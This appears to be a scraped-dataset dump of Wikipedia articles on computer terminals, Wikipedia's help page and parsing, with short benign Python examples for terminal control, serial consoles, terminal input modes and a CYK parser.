device with significant local, programmable data-processing capability may be called a "smart terminal" or fat client. A terminal that depends on the host computer for its processing power is called a "dumb terminal" 5 or a thin client. 6 7 In the era of serial (RS 232) terminals there was a conflicting usage of the term "smart terminal" as a dumb terminal with no user-accessible local computing power but a particularly rich set of control codes for manipulating the display; this conflict was not resolved before hardware serial terminals became obsolete. A personal computer can run terminal emulator software that replicates functions of a real-world terminal, sometimes allowing concurrent use of local programs and access to a distant terminal host system, either over a direct serial connection or over a network using, e.g., SSH. Today few if any dedicated computer terminals are being manufactured, as time sharing on large computers has been replaced by personal computers, handheld devices and workstations with graphical user interfaces. User interactions with servers use either software such as Web browsers, or terminal emulators, with connections over high-speed networks. The console of Konrad Zuse's Z3 had a keyboard in 1941, as did the Z4 in 1942 1945. However, these consoles could only be used to enter numeric inputs and were thus analogous to those of calculating machines; programs, commands, and other data were entered via paper tape. Both machines had a row of display lamps for results. 
In 1956, the Whirlwind Mark I computer became the first computer equipped with a keyboard-printer combination with which to support direct input 4 of data and commands and output of results. That device was a Friden Flexowriter, which would continue to serve this purpose on many other early computers well into the 1960s. Early user terminals connected to computers were, like the Flexowriter, electromechanical teleprinters teletypewriters (TeleTYpewriter, TTY), such as the Teletype Model 33, originally used for telegraphy; early Teletypes were typically configured as Keyboard Send-Receive (KSR) or Automatic Send-Receive (ASR). Some terminals, such as the ASR Teletype models, included a paper tape reader and punch which could record output such as a program listing. The data on the tape could be re-entered into the computer using the tape reader on the teletype, or printed to paper. Teletypes used the current loop interface that was already used in telegraphy. A less expensive Read Only (RO) configuration was available for the Teletype. Custom-designs keyboard printer terminals that came later included the IBM 2741 (1965) 8 and the DECwriter (1970). 9 Respective top speeds of teletypes, IBM 2741 and the LA30 (an early DECwriter) were 10, 15 and 30 characters per second. Although at that time "paper was king" 9 10 the speed of interaction was relatively limited. The DECwriter was the last major printing-terminal product. It faded away after 1980 under pressure from video display units (VDUs), with the last revision (the DECwriter IV of 1982) abandoning the classic teletypewriter form for one more resembling a desktop printer. A video display unit (VDU) displays information on a screen rather than printing text to paper and typically uses a cathode-ray tube (CRT). VDUs in the 1950s were typically designed for displaying graphical data rather than text and were used in, e.g., experimental computers at institutions like MIT; computers used in academia, government and business, sold under brand names like DEC, ERA, IBM and UNIVAC; military computers supporting specific defence applications such as ballistic missile warning systems and radar air defence coordination systems like BUIC and SAGE. Two early landmarks in the development of the VDU were the Univac Uniscope 11 12 13 and the IBM 2260, 14 both in 1964. These were block-mode terminals designed to display a page at a time, using proprietary protocols; in contrast to character-mode devices, they enter data from the keyboard into a display buffer rather than transmitting them immediately. In contrast to later character-mode devices, the Uniscope used synchronous serial communication over an EIA RS 232 interface to communicate between the multiplexer and the host, while the 2260 used either a channel connection or asynchronous serial communication between the 2848 and the host. The 2265, related to the 2260, also used asynchronous serial communication. The Datapoint 3300 from Computer Terminal Corporation, announced in 1967 and shipped in 1969, was a character-mode device that emulated a Model 33 Teletype. This reflects the fact that early character-mode terminals were often deployed to replace teletype machines as a way to reduce operating costs. The next generation of VDUs went beyond teletype emulation with an addressable cursor that gave them the ability to paint two-dimensional displays on the screen. Very early VDUs with cursor addressibility included the VT05 and the Hazeltine 2000 operating in character mode, both from 1970. 
Despite this capability, early devices of this type were often called "Glass TTYs". 15 Later, the term "glass TTY" tended to be retrospectively narrowed to devices without full cursor addressability. The classic era of the VDU began in the early 1970s and was closely intertwined with the rise of time-sharing computers. Important early products were the ADM 3A, VT52, and VT100. These devices used no complicated CPU, instead relying on individual logic gates, LSI chips, or microprocessors such as the Intel 8080. This made them inexpensive and they quickly became extremely popular input-output devices on many types of computer system, often replacing earlier and more expensive printing terminals. After 1970 several suppliers gravitated to a set of common standards: The experimental era of serial VDUs culminated with the VT100 in 1978. By the early 1980s, there were dozens of manufacturers of terminals, including Lear-Siegler, ADDS, Data General, DEC, Hazeltine Corporation, Heath Zenith, Hewlett-Packard, IBM, TeleVideo, Volker-Craig, and Wyse, many of which had incompatible command sequences (although many used the early ADM 3 as a starting point). The great variations in the control codes between makers gave rise to software that identified and grouped terminal types so the system software would correctly display input forms using the appropriate control codes; in Unix-like systems the termcap or terminfo files, the stty utility, and the TERM environment variable would be used; in Data General's Business BASIC software, for example, at login time a sequence of codes was sent to the terminal to try to read the cursor's position or the 25th line's contents using a sequence of different manufacturers' control code sequences, and the terminal-generated response would determine a single-digit number (such as 6 for Data General Dasher terminals, 4 for ADM 3A 5 11 12 terminals, 0 or 2 for TTYs with no special features) that would be available to programs to say which set of codes to use. The great majority of terminals were monochrome, with manufacturers variously offering green, white or amber and sometimes blue screen phosphors. (Amber was claimed to reduce eye strain.) Terminals with modest color capability were also available but not widely used; for example, a color version of the popular Wyse WY50, the WY350, offered 64 shades on each character cell. VDUs were eventually displaced from most applications by networked personal computers, at first slowly after 1985 and with increasing speed in the 1990s. However, they had a lasting influence on PCs. The keyboard layout of the VT220 terminal strongly influenced the Model M shipped on IBM PCs from 1985, and through it all later computer keyboards. Although flat-panel displays had been available since the 1950s, cathode-ray tubes continued to dominate the market until the personal computer had made serious inroads into the display terminal market. By the time cathode-ray tubes on PCs were replaced by flatscreens after the year 2000, the hardware computer terminal was nearly obsolete. A character-oriented terminal is a type of computer terminal that communicates with its host one character at a time, as opposed to a block-oriented terminal that communicates in blocks of data. It is the most common type of data terminal, because it is easy to implement and program. Connection to the mainframe computer or terminal server is achieved via RS 232 serial links, Ethernet or other proprietary protocols. Character-oriented terminals can be "dumb" or "smart". 
Dumb terminals 5 are those that can interpret a limited number of control codes (CR, LF, etc.) but do not have the ability to process special escape sequences that perform functions such as clearing a line, clearing the screen, or controlling cursor position. In this context dumb terminals are sometimes dubbed glass Teletypes, for they essentially have the same limited functionality as does a mechanical Teletype. This type of dumb terminal is still supported on modern Unix-like systems by setting the environment variable TERM to dumb. Smart or intelligent terminals are those that also have the ability to process escape sequences, in particular the VT52, VT100 or ANSI escape sequences. A text terminal, or often just terminal (sometimes text console) is a serial computer interface for text entry and display. Information is presented as an array of pre-selected formed characters. When such devices use a video display such as a cathode-ray tube, they are called a "video display unit" or "visual display unit" (VDU) or "video display terminal" (VDT). The system console is often 16 a text terminal used to operate a computer. Modern computers have a built-in keyboard and display for the console. Some Unix-like operating systems such as Linux and FreeBSD have virtual consoles to provide several text terminals on a single computer. The fundamental type of application running on a text terminal is a command-line interpreter or shell, which prompts for commands from the user and executes each command after a press of Return. 17 This includes Unix shells and some interactive programming environments. In a shell, most of the commands are small applications themselves. Another important application type is that of the text editor. A text editor typically occupies the full area of display, displays one or more text documents, and allows the user to edit the documents. The text editor has, for many uses, been replaced by the word processor, which usually provides rich formatting features that the text editor lacks. The first word processors used text to communicate the structure of the document, but later word processors operate in a graphical environment and provide a WYSIWYG simulation of the formatted output. However, text editors are still used for documents containing markup such as DocBook or LaTeX. Programs such as Telix and Minicom control a modem and the local terminal to let the user interact with remote servers. On the Internet, telnet and ssh work similarly. In the simplest form, a text terminal is like a file. Writing to the file displays the text and reading from the file produces what the user enters. In Unix-like operating systems, there are several character special files that correspond to available text terminals. For other operations, there are special escape sequences, control characters and termios functions that a program can use, most easily via a library such as ncurses. For more complex operations, the programs can use terminal specific ioctl system calls. For an application, the simplest way to use a terminal is to simply write and read text strings to and from it sequentially. The output text is scrolled, so that only the last several lines (typically 24) are visible. Unix systems typically buffer the input text until the Enter key is pressed, so the application receives a ready string of text. In this mode, the application need not know much about the terminal. For many interactive applications this is not sufficient. 
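The TERM=dumb behaviour described in the scraped passage can be illustrated with a short, hedged Python sketch. The escape codes below are the standard ANSI/VT100 clear-screen and cursor-home sequences mentioned above; the fallback of printing blank lines for a dumb terminal is an assumption made purely for illustration.

import os
import sys

def clear_screen():
    # A minimal sketch: honour TERM=dumb (as described above) by avoiding
    # escape sequences; otherwise emit the standard ANSI clear-screen and
    # cursor-home codes understood by VT100-style terminals.
    if os.environ.get("TERM", "dumb") == "dumb":
        # Dumb terminals only interpret basic control codes (CR, LF, ...),
        # so scroll the old text away with blank lines instead.
        sys.stdout.write("\n" * 24)
    else:
        sys.stdout.write("\x1b[2J\x1b[H")  # ESC[2J = clear, ESC[H = home
    sys.stdout.flush()

clear_screen()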
One of the common enhancements is command-line editing (assisted with such libraries as readline); it also may give access to command history. This is very helpful for various interactive command-line interpreters. Even more advanced interactivity is provided with full-screen applications. Those applications completely control the screen layout; also they respond to key-pressing immediately. This mode is very useful for text editors, file managers and web browsers. In addition, such programs control the color and brightness of text on the screen, and decorate it with underline, blinking and special characters (e.g. box-drawing characters). To achieve all this, the application must deal not only with plain text strings, but also with control characters and escape sequences, which allow moving the cursor to an arbitrary position, clearing portions of the screen, changing colors and displaying special characters, and also responding to function keys. The great problem here is that there are many different terminals and terminal emulators, each with its own set of escape sequences. In order to overcome this, special libraries (such as curses) have been created, together with terminal description databases, such as Termcap and Terminfo. A block-oriented terminal or block mode terminal is a type of computer terminal that communicates with its host in blocks of data, as opposed to a character-oriented terminal that communicates with its host one character at a time. A block-oriented terminal may be card-oriented, display-oriented, keyboard-display, keyboard-printer, printer or some combination. The IBM 3270 is perhaps the most familiar implementation of a block-oriented display terminal, 18 but most mainframe computer manufacturers and several other companies produced them. The description below is in terms of the 3270, but similar considerations apply to other types. Block-oriented terminals typically incorporate a buffer which stores one screen or more of data, and also stores data attributes, not only indicating appearance (color, brightness, blinking, etc.) but also marking the data as being enterable by the terminal operator vs. protected against entry, as allowing the entry of only numeric information vs. allowing any characters, etc. In a typical application the host sends the terminal a preformatted panel containing both static data and fields into which data may be entered. The terminal operator keys data, such as updates in a database entry, into the appropriate fields. When entry is complete (or ENTER or PF key pressed on 3270s), a block of data, usually just the data entered by the operator (modified data), is sent to the host in one transmission. The 3270 terminal buffer (at the device) could be updated on a single character basis, if necessary, because of the existence of a "set buffer address order" (SBA), that usually preceded any data to be written overwritten within the buffer. A complete buffer could also be read or replaced using the READ BUFFER command or WRITE command (unformatted or formatted in the case of the 3270). Block-oriented terminals cause less system load on the host and less network traffic than character-oriented terminals. They also appear more responsive to the user, especially over slow connections, since editing within a field is done locally rather than depending on echoing from the host system. Early terminals had limited editing capabilities 3270 terminals, for example, only could check entries as valid numerics. 
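As a rough illustration of the full-screen, curses-style applications described above, here is a minimal sketch using Python's standard curses module, which consults the terminfo/termcap databases mentioned in the passage; the displayed text is made up for the example and it needs to run in a real terminal.

import curses

def demo(stdscr):
    # curses looks up the escape sequences for the current TERM in the
    # terminfo database, so the same code works across different terminals.
    stdscr.clear()
    stdscr.addstr(0, 0, "Full-screen mode via curses", curses.A_BOLD)
    stdscr.addstr(2, 0, "Press any key to exit.")
    stdscr.refresh()
    stdscr.getch()                   # react to a single key press immediately

if __name__ == "__main__":
    curses.wrapper(demo)             # sets up and safely restores the terminal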
19 Subsequent "smart" or "intelligent" terminals incorporated microprocessors and supported more local processing. Programmers of block-oriented terminals often used the technique of storing context information for the transaction in progress on the screen, possibly in a hidden field, rather than depending on a running program to keep track of status. This was the precursor of the HTML technique of storing context in the URL as data to be passed as arguments to a CGI program. Unlike a character-oriented terminal, where typing a character into the last position of the screen usually causes the terminal to scroll down one line, entering data into the last screen position on a block-oriented terminal usually causes the cursor to wrap— move to the start of the first enterable field. Programmers might "protect" the last screen position to prevent inadvertent wrap. Likewise a protected field following an enterable field might lock the keyboard and sound an audible alarm if the operator attempted to enter more data into the field than allowed. A graphical terminal can display images as well as text. Graphical terminals 23 are divided into vector-mode terminals, and raster mode. A vector-mode display directly draws lines on the face of a cathode-ray tube under control of the host computer system. The lines are continuously formed, but since the speed of electronics is limited, the number of concurrent lines that can be displayed at one time is limited. Vector-mode displays were historically important but are no longer used. Practically all modern graphic displays are raster-mode, descended from the picture scanning techniques used for television, in which the visual elements are a rectangular array of pixels. Since the raster image is only perceptible to the human eye as a whole for a very short time, the raster must be refreshed many times per second to give the appearance of a persistent display. The electronic demands of refreshing display memory meant that graphic terminals were developed much later than text terminals, and initially cost much more. 24 25 Most terminals today when? are graphical; that is, they can show images on the screen. The modern term for graphical terminal is "thin client". citation needed A thin client typically uses a protocol like X11 for Unix terminals, or RDP for Microsoft Windows. The bandwidth needed depends on the protocol used, the resolution, and the color depth. Modern graphic terminals allow display of images in color, and of text in varying sizes, colors, and fonts (type faces). clarification needed In the early 1990s, an industry consortium attempted to define a standard, AlphaWindows, that would allow a single CRT screen to implement multiple windows, each of which was to behave as a distinct terminal. Unfortunately, like I2O, this suffered from being run as a closed standard: non-members were unable to obtain even minimal information and there was no realistic way a small company or independent developer could join the consortium. citation needed An intelligent terminal 26 does its own processing, usually implying a microprocessor is built in, but not all terminals with microprocessors did any real processing of input: the main computer to which it was attached would have to respond quickly to each keystroke. The term "intelligent" in this context dates from 1969. 27 Notable examples include the IBM 2250, predecessor to the IBM 3250 and IBM 5080, and IBM 2260, 28 predecessor to the IBM 3270, introduced with System 360 in 1964. 
Most terminals were connected to minicomputers or mainframe computers and often had a green or amber screen. Typically terminals communicate with the computer via a serial port via a null modem cable, often using an EIA RS 232 or RS 422 or RS 423 or a current loop serial interface. IBM systems typically communicated over a Bus and Tag channel, a coaxial cable using a proprietary protocol, a communications link using Binary Synchronous Communications or IBM's SNA protocol, but for many DEC, Data General and NCR (and so on) computers there were many visual display suppliers competing against the computer manufacturer for terminals to expand the systems. In fact, the instruction design for the Intel 8008 was originally conceived at Computer Terminal Corporation as the processor for the Datapoint 2200. From the introduction of the IBM 3270, and the DEC VT100 (1978), the user and programmer could notice significant advantages in VDU technology improvements, yet not all programmers used the features of the new terminals (backward compatibility in the VT100 and later TeleVideo terminals, for example, with "dumb terminals" allowed programmers to continue to use older software). Some dumb terminals had been able to respond to a few escape sequences without needing microprocessors: they used multiple printed circuit boards with many integrated circuits; the single factor that classed a terminal as "intelligent" was its ability to process user-input within the terminal—not interrupting the main computer at each keystroke—and send a block of data at a time (for example: when the user has finished a whole field or form). Most terminals in the early 1980s, such as ADM 3A, TVI912, Data General D2, DEC VT52, despite the introduction of ANSI terminals in 1978, were essentially "dumb" terminals, although some of them (such as the later ADM and TVI models) did have a primitive block-send capability. Common early uses of local processing power included features that had little to do with off-loading data processing from the host computer but added useful features such as printing to a local printer, buffered serial data transmission and serial handshaking (to accommodate higher serial transfer speeds), and more sophisticated character attributes for the display, as well as the ability to switch emulation modes to mimic competitor's models, that became increasingly important selling features during the 1980s especially, when buyers could mix and match different suppliers' equipment to a greater extent than before. The advance in microprocessors and lower memory costs made it possible for the terminal to handle editing operations such as inserting characters within a field that may have previously required a full screen-full of characters to be re-sent from the computer, possibly over a slow modem line. Around the mid 1980s most intelligent terminals, costing less than most dumb terminals would have a few years earlier, could provide enough user-friendly local editing of data and send the completed form to the main computer. Providing even more processing possibilities, workstations like the TeleVideo TS 800 could run CP M 86, blurring the distinction between terminal and Personal Computer. Another of the motivations for development of the microprocessor was to simplify and reduce the electronics required in a terminal. 
That also made it practicable to load several "personalities" into a single terminal, so a Qume QVT 102 could emulate many popular terminals of the day, and so be sold into organizations that did not wish to make any software changes. Frequently emulated terminal types included: The ANSI X3.64 escape code standard produced uniformity to some extent, but significant differences remained. For example, the VT100, Heathkit H19 in ANSI mode, Televideo 970, Data General D460, and Qume QVT 108 terminals all followed the ANSI standard, yet differences might exist in codes from function keys, what character attributes were available, block-sending of fields within forms, "foreign" character facilities, and handling of printers connected to the back of the screen. In the 21st century, the term Intelligent Terminal can now refer to a retail Point of Sale computer. 29 While early IBM PCs had single-color green screens, these screens were not terminals. The screen of a PC did not contain any character generation hardware; all video signals and video formatting were generated by the video display card in the PC, or (in most graphics modes) by the CPU and software. An IBM PC monitor, whether it was the green monochrome display or the 16 color display, was technically much more similar to an analog TV set (without a tuner) than to a terminal. With suitable software a PC could, however, emulate a terminal, and in that capacity it could be connected to a mainframe or minicomputer. The Data General One could be booted into terminal emulator mode from its ROM. Eventually microprocessor-based personal computers greatly reduced the market demand for conventional terminals. In the 1990s especially, "thin clients" and X terminals have combined economical local processing power with central, shared computer facilities to retain some of the advantages of terminals over personal computers: Today, most PC telnet clients provide emulation of the most common terminal, citation needed the DEC VT100, using the ANSI escape code standard X3.64, or could run as X terminals using software such as Cygwin X under Microsoft Windows or X.Org Server software under Linux. Since the advent and subsequent popularization of the personal computer, few genuine hardware terminals are used to interface with computers today. Using the monitor and keyboard, modern operating systems like Linux and the BSD derivatives feature virtual consoles, which are mostly independent from the hardware used. When using a graphical user interface (or GUI) like the X Window System, one's display is typically occupied by a collection of windows associated with various applications, rather than a single stream of text associated with a single process. In this case, one may use a terminal emulator application within the windowing environment. This arrangement permits terminal-like interaction with the computer (for running a command-line interpreter, for example) without the need for a physical terminal device; it can even run multiple terminal emulators on the same device. Several categories of terminals described above have been used as hardware and software consoles, with some variation in the nomenclature. These may be keyboard printer terminals, keyboard display terminals, or special applications running on a smaller computer. They frequently attach via a proprietary interface, and supplement or replace the functions of a front panel. They are sometimes referred to as control consoles or system consoles. 
These may be keyboard printer terminals, keyboard display terminals or applications. On some systems, e.g., OS 360, they have a specialized role with its own command language, unrelated to the command language for user sessions on normal terminals. On, e.g., Unix-like systems, the software is controlled by users with elevated privileges and a system console is just an ordinary terminal with a privileged user logged on. It is common for, e.g., Unix-like systems, to include applications with names like command, console, terminal, to serve as consoles for the logged on user. One meaning of system console, computer console, root console, operator's console, or simply console is the text entry and display device for system administration messages, particularly those from the BIOS or boot loader, the kernel, from the init system and from the system logger. It is a physical device consisting of a keyboard and a printer or screen, and traditionally is a text terminal, but may also be a graphical terminal. System consoles are generalized to computer terminals, which are abstracted respectively by virtual consoles and terminal emulators. Today communication with system consoles is generally done abstractly, via the standard streams (stdin, stdout, and stderr), but there may be system-specific interfaces, for example those used by the system kernel. 30 better source needed Another, older, meaning of system console, computer console, hardware console, operator's console or simply console is a hardware component used by an operator to control the hardware, typically some combination of front panel, keyboard printer and keyboard display. Prior to the development of alphanumeric CRT system consoles, some computers such as the IBM 1620 had console typewriters and front panels while the very first electronic stored-program computer, the Manchester Baby, used a combination of electromechanical switches and a CRT to provide console functions—the CRT displaying memory contents in binary by mirroring the machine's Williams-Kilburn tube CRT-based RAM. Some early operating systems supported either a single keyboard print or keyboard display device for controlling the OS. Some also supported a single alternate console, and some supported a hardcopy console for retaining a record of commands, responses and other console messages. However, in the late 1960s it became common for operating systems to support many more consoles than 3, and operating systems began appearing in which the console was simply any terminal with a privileged user logged on. On early minicomputers, the console was a serial console, an RS 232 serial link to a terminal such as a ASR 33 or, later, a terminal from Digital Equipment Corporation (DEC), e.g., DECWriter, VT100. This terminal was usually kept in a secured room since it could be used for certain privileged functions such as halting the system or selecting which media to boot from. Large midrange systems, e.g. those from Sun Microsystems, Hewlett-Packard and IBM, citation needed still use serial consoles. In larger installations, the console ports are attached to multiplexers or network-connected multiport serial servers that let an operator connect a terminal to any of the attached servers. Today, serial consoles are often used for accessing headless systems, usually with a terminal emulator running on a laptop. Also, routers, enterprise network switches and other telecommunication equipment have RS 232 serial console ports. 
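Accessing a serial console of the kind described above is often scripted as well. The following is only a sketch using the third-party pyserial package (not installed by this notebook); the device path and line settings are assumptions that would have to match the actual hardware.

# Requires the third-party pyserial package: pip install pyserial
import serial

# Assumed device path and settings; headless servers and routers commonly use
# 9600 or 115200 baud, 8 data bits, no parity, 1 stop bit.
with serial.Serial("/dev/ttyUSB0", baudrate=115200, timeout=1) as console:
    console.write(b"\r\n")               # nudge the console to show a prompt
    banner = console.read(256)           # read whatever the device sends back
    print(banner.decode(errors="replace"))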
On PCs and workstations, the computer's attached keyboard and monitor have the equivalent function. Since the monitor cable carries video signals, it cannot be extended very far. Often, installations with many servers therefore use keyboard video multiplexers (KVM switches) and possibly video amplifiers to centralize console access. In recent years, KVM IP devices have become available that allow a remote computer to view the video output and send keyboard input via any TCP IP network and therefore the Internet. Some PC BIOSes, especially in servers, also support serial consoles, giving access to the BIOS through a serial port so that the simpler and cheaper serial console infrastructure can be used. Even where BIOS support is lacking, some operating systems, e.g. FreeBSD and Linux, can be configured for serial console operation either during bootup, or after startup. Starting with the IBM 9672, IBM large systems have used a Hardware Management Console (HMC), consisting of a PC and a specialized application, instead of a 3270 or serial link. Other IBM product lines also use an HMC, e.g., System p. It is usually possible to log in from the console. Depending on configuration, the operating system may treat a login session from the console as being more trustworthy than a login session from other sources. A terminal emulator is a piece of software that emulates a text terminal. In the past, before the widespread use of local area networks and broadband internet access, many computers would use a serial access program to communicate with other computers via telephone line or serial device. When the first Macintosh was released, a program called MacTerminal 31 was used to communicate with many computers, including the IBM PC. The Win32 console on Windows does not emulate a physical terminal that supports escape sequences 32 dubious discuss so SSH and Telnet programs (for logging in textually to remote computers) for Windows, including the Telnet program bundled with some versions of Windows, often incorporate their own code to process escape sequences. The terminal emulators on most Unix-like systems—such as, for example, gnome-terminal, Konsole, QTerminal, xterm, and Terminal.app—do emulate physical terminals including support for escape sequences; e.g., xterm can emulate the VT220 and Tektronix 4010 hardware terminals. Terminals can operate in various modes, relating to when they send input typed by the user on the keyboard to the receiving system (whatever that may be): There is a distinction between the return and the Enter keys. In some multiple-mode terminals, that can switch between modes, pressing the Enter key when not in block mode does not do the same thing as pressing the return key. Whilst the return key will cause an input line to be sent to the host in line-at-a-time mode, the Enter key will rather cause the terminal to transmit the contents of the character row where the cursor is currently positioned to the host, host-issued prompts and all. 35 Some block-mode terminals have both an Enter and local cursor moving keys such as Return and New Line. Different computer operating systems require different degrees of mode support when terminals are used as computer terminals. 
The POSIX terminal interface, as provided by Unix and POSIX-compliant operating systems, does not accommodate block-mode terminals at all, and only rarely requires the terminal itself to be in line-at-a-time mode, since the operating system is required to provide canonical input mode, where the terminal device driver in the operating system emulates local echo in the terminal, and performs line editing functions at the host end. Most usually, and especially so that the host system can support non-canonical input mode, terminals for POSIX-compliant systems are always in character-at-a-time mode. In contrast, IBM 3270 terminals connected to MVS systems are always required to be in block mode. 37 38 39 40 |
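The canonical versus non-canonical input modes discussed above can be demonstrated with Python's standard termios and tty modules. This is a sketch only: it is Unix-specific and needs an interactive terminal on stdin; the prompt text is illustrative.

import sys
import termios
import tty

# In canonical mode the terminal driver buffers a whole line and handles
# editing; in non-canonical (cbreak) mode each keystroke is delivered at once.
fd = sys.stdin.fileno()
saved = termios.tcgetattr(fd)            # remember the canonical-mode settings
try:
    tty.setcbreak(fd)                    # switch to character-at-a-time input
    print("Press one key (no Enter needed):")
    key = sys.stdin.read(1)              # returns after a single keystroke
    print(f"Got: {key!r}")
finally:
    termios.tcsetattr(fd, termios.TCSADRAIN, saved)  # restore canonical mode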
462 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Contents | This page provides help with the most common questions about Wikipedia. You can also search Wikipedia's help pages using the search box below, or browse the Help menu or the Help directory. The Readers' FAQ and our about page contain the most commonly sought information about Wikipedia. For simple searches, there is a search box at the top of every page. Type what you are looking for in the box. Partial matches will appear in a dropdown list. Select any page in the list to go to that page. Or, select the magnifying glass "Go" button, or press Enter, to go to a full search result. For advanced searches, see Help:Searching. There are other ways to browse and explore Wikipedia articles; many can be found at Wikipedia:Contents. See our disclaimer for cautions about Wikipedia's limitations. For mobile access, press the mobile view link at the very bottom of every desktop view page. Contributing is easy: see how to edit a page. For a quick summary on participating, see contributing to Wikipedia, and for a friendly tutorial, see our introduction. For a listing of introductions and tutorials by topic, see getting started. The Simplified Manual of Style and Cheatsheet can remind you of basic wiki markup. Be bold in improving articles When adding facts, please provide references so others may verify them. If you are affiliated with the article subject, please see our conflict of interest guideline. The simple guide to vandalism cleanup can help you undo malicious edits. If you're looking for places you can help out, the Task Center is the place to go, or check out what else is happening at the community portal. You can practice editing and experiment in a sandboxyour sandbox. If there is a problem with an article about yourself, a family member, a friend or a colleague, please read Biographies of living persons Help. If you spot a problem with an article, you can fix it directly, by clicking on the "Edit" link at the top of that page. See the "edit an article" section of this page for more information. If you don't feel ready to fix the article yourself, post a message on the article's talk page. This will bring the matter to the attention of others who work on that article. There is a "Talk" link at the beginning of every article page. You can contact us. If it's an article about you or your organization, see Contact us Subjects. Check Your first article to see if your topic is appropriate, then the Article wizard will walk you through creating the article. Once you have created an article, see Writing better articles for guidance on how to improve it and what to include (like reference citations). For contributing images, audio or video files, see the Introduction to uploading images. Then the Upload wizard will guide you through that process. Answers to common problems can be found at frequently asked questions. Or check out where to ask questions or make comments. New users should seek help at the Teahouse if they're having problems while editing Wikipedia. More complex questions can be posed at the Help desk. Volunteers will respond as soon as they're able. Or ask for help on your talk page and a volunteer will visit you there You can get live help with editing in the help chatroom. For help with technical issues, ask at the Village pump. If searching Wikipedia has not answered your question (for example, questions like "Which country has the world's largest fishing fleet? 
), try the Reference Desk. Volunteers there will attempt to answer your questions on any topic, or point you toward the information you need. |
463 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Parsing | Parsing, syntax analysis, or syntactic analysis is the process of analyzing a string of symbols, either in natural language, computer languages or data structures, conforming to the rules of a formal grammar. The term parsing comes from Latin pars (orationis), meaning part (of speech). 1 The term has slightly different meanings in different branches of linguistics and computer science. Traditional sentence parsing is often performed as a method of understanding the exact meaning of a sentence or word, sometimes with the aid of devices such as sentence diagrams. It usually emphasizes the importance of grammatical divisions such as subject and predicate. Within computational linguistics the term is used to refer to the formal analysis by a computer of a sentence or other string of words into its constituents, resulting in a parse tree showing their syntactic relation to each other, which may also contain semantic information. citation needed Some parsing algorithms generate a parse forest or list of parse trees from a string that is syntactically ambiguous. 2 The term is also used in psycholinguistics when describing language comprehension. In this context, parsing refers to the way that human beings analyze a sentence or phrase (in spoken language or text) "in terms of grammatical constituents, identifying the parts of speech, syntactic relations, etc. 1 This term is especially common when discussing which linguistic cues help speakers interpret garden-path sentences. Within computer science, the term is used in the analysis of computer languages, referring to the syntactic analysis of the input code into its component parts in order to facilitate the writing of compilers and interpreters. The term may also be used to describe a split or separation. The traditional grammatical exercise of parsing, sometimes known as clause analysis, involves breaking down a text into its component parts of speech with an explanation of the form, function, and syntactic relationship of each part. 3 This is determined in large part from study of the language's conjugations and declensions, which can be quite intricate for heavily inflected languages. To parse a phrase such as "man bites dog" involves noting that the singular noun "man" is the subject of the sentence, the verb "bites" is the third person singular of the present tense of the verb "to bite", and the singular noun "dog" is the object of the sentence. Techniques such as sentence diagrams are sometimes used to indicate relation between elements in the sentence. Parsing was formerly central to the teaching of grammar throughout the English-speaking world, and widely regarded as basic to the use and understanding of written language. However, the general teaching of such techniques is no longer current. citation needed In some machine translation and natural language processing systems, written texts in human languages are parsed by computer programs. 4 Human sentences are not easily parsed by programs, as there is substantial ambiguity in the structure of human language, whose usage is to convey meaning (or semantics) amongst a potentially unlimited range of possibilities, but only some of which are germane to the particular case. 
5 So an utterance "Man bites dog" versus "Dog bites man" is definite on one detail but in another language might appear as "Man dog bites" with a reliance on the larger context to distinguish between those two possibilities, if indeed that difference was of concern. It is difficult to prepare formal rules to describe informal behaviour even though it is clear that some rules are being followed. citation needed In order to parse natural language data, researchers must first agree on the grammar to be used. The choice of syntax is affected by both linguistic and computational concerns; for instance some parsing systems use lexical functional grammar, but in general, parsing for grammars of this type is known to be NP-complete. Head-driven phrase structure grammar is another linguistic formalism which has been popular in the parsing community, but other research efforts have focused on less complex formalisms such as the one used in the Penn Treebank. Shallow parsing aims to find only the boundaries of major constituents such as noun phrases. Another popular strategy for avoiding linguistic controversy is dependency grammar parsing. Most modern parsers are at least partly statistical; that is, they rely on a corpus of training data which has already been annotated (parsed by hand). This approach allows the system to gather information about the frequency with which various constructions occur in specific contexts. (See machine learning.) Approaches which have been used include straightforward PCFGs (probabilistic context-free grammars), 6 maximum entropy, 7 and neural nets. 8 Most of the more successful systems use lexical statistics (that is, they consider the identities of the words involved, as well as their part of speech). However such systems are vulnerable to overfitting and require some kind of smoothing to be effective. citation needed Parsing algorithms for natural language cannot rely on the grammar having 'nice' properties as with manually designed grammars for programming languages. As mentioned earlier some grammar formalisms are very difficult to parse computationally; in general, even if the desired structure is not context-free, some kind of context-free approximation to the grammar is used to perform a first pass. Algorithms which use context-free grammars often rely on some variant of the CYK algorithm, usually with some heuristic to prune away unlikely analyses to save time. (See chart parsing.) However some systems trade speed for accuracy using, e.g., linear-time versions of the shift-reduce algorithm. A somewhat recent development has been parse reranking in which the parser proposes some large number of analyses, and a more complex system selects the best option. citation needed In natural language understanding applications, semantic parsers convert the text into a representation of its meaning. 9 In psycholinguistics, parsing involves not just the assignment of words to categories (formation of ontological insights), but the evaluation of the meaning of a sentence according to the rules of syntax drawn by inferences made from each word in the sentence (known as connotation). This normally occurs as words are being heard or read. Neurolinguistics generally understands parsing to be a function of working memory, meaning that parsing is used to keep several parts of one sentence at play in the mind at one time, all readily accessible to be analyzed as needed. Because the human working memory has limitations, so does the function of sentence parsing. 
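The CYK algorithm mentioned above can be sketched as a small recognizer for a grammar in Chomsky normal form. The toy lexicon and rules below cover only the article's "man bites dog" example and are assumptions made for illustration, not a serious natural-language grammar.

from itertools import product

def cyk_recognize(words, lexicon, rules, start="S"):
    # CYK recognizer for a grammar in Chomsky normal form.
    # lexicon: word -> set of nonterminals A with a rule A -> word
    # rules:   (B, C) -> set of nonterminals A with a rule A -> B C
    n = len(words)
    table = [[set() for _ in range(n)] for _ in range(n)]
    for i, w in enumerate(words):
        table[i][i] = set(lexicon.get(w, ()))
    for span in range(2, n + 1):                 # length of the substring
        for i in range(n - span + 1):
            j = i + span - 1
            for k in range(i, j):                # split point
                for B, C in product(table[i][k], table[k + 1][j]):
                    table[i][j] |= rules.get((B, C), set())
    return start in table[0][n - 1]

# Toy grammar for the "man bites dog" example (illustrative only).
lexicon = {"man": {"NP"}, "dog": {"NP"}, "bites": {"V"}}
rules = {("NP", "VP"): {"S"}, ("V", "NP"): {"VP"}}
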